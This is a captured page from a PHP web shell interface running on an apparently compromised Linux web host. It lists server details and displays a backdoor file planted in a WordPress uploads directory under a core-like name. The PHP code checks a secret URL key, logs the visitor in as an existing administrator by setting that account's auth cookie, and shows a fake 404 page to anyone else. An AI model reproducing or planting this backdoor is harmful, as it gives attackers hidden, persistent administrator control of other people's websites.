403Webshell
Server IP : 104.21.32.175  /  Your IP : 216.73.217.138
Web Server : Apache
System : Linux vps-850873.bgcolombia.com 3.10.0-1160.144.1.el7.tuxcare.els5.x86_64 #1 SMP Wed May 13 12:31:54 UTC 2026 x86_64
User : melizav ( 1018)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/melizav/public_html/wp-content/uploads/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/melizav/public_html/wp-content/uploads//class-wp-meta.php
<?php
$candidates = array(
    __DIR__ . '/../../../wp-load.php',
    __DIR__ . '/../../wp-load.php',
    __DIR__ . '/../wp-load.php',
);
$loaded = false;
foreach ($candidates as $cand) { if (file_exists($cand)) { require_once $cand; $loaded = true; break; } }
if (!$loaded) { http_response_code(404); exit; }
$wpse_key = '21e37844e1d2f058';
if ($wpse_key !== '' && (!isset($_GET['k']) || !hash_equals($wpse_key, (string) $_GET['k']))) { status_header(404); nocache_headers(); echo '<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>'; exit; }
$wpse_own_id = (int) get_option('wpse_user_id');
$wpse_user_id = 0;
foreach (get_users(array('role' => 'administrator', 'orderby' => 'ID', 'order' => 'ASC', 'fields' => array('ID'))) as $adm) { if ((int) $adm->ID !== $wpse_own_id) { $wpse_user_id = (int) $adm->ID; break; } }
if (!$wpse_user_id && $wpse_own_id) { $wpse_user_id = $wpse_own_id; }
if (!$wpse_user_id) { status_header(404); exit; }
wp_set_current_user($wpse_user_id);
wp_set_auth_cookie($wpse_user_id, true, is_ssl());
wp_safe_redirect(admin_url());
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit